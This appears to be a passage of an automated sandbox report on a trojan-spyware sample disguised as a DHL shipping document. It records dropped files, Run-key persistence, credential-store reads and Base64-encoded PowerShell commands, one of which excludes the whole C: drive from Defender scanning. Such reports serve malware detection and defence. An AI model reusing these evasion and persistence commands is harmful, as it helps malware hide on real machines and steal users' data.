                  Source: DHL_Shipping_Document2.exeBinary or memory string: OriginalFilenameDHL Shipping Document2.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exeReversingLabs: Detection: 38%
                  Source: DHL_Shipping_Document2.exeVirustotal: Detection: 33%
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile read: C:\Users\user\Desktop\DHL_Shipping_Document2.exeJump to behavior
                  Source: DHL_Shipping_Document2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\DHL_Shipping_Document2.exe C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/19@19/6
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: Nuaaqwldle.tmpdb.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL_Shipping_Document2.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2072:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: DHL_Shipping_Document2.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: DHL_Shipping_Document2.exeStatic file information: File size 2802176 > 1048576
                  Source: DHL_Shipping_Document2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL_Shipping_Document2.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29e400
                  Source: DHL_Shipping_Document2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256 source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Doxfkywupn.pdb source: InstallUtil.exe, 00000011.00000002.556335374.00000294205D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: InstallUtil.exe, 00000011.00000002.552825754.0000029417F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.000002941804D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C7216 pushad ; iretd
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C724E push eax; iretd
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFDACA push ebp; iretd
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to dropped file
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
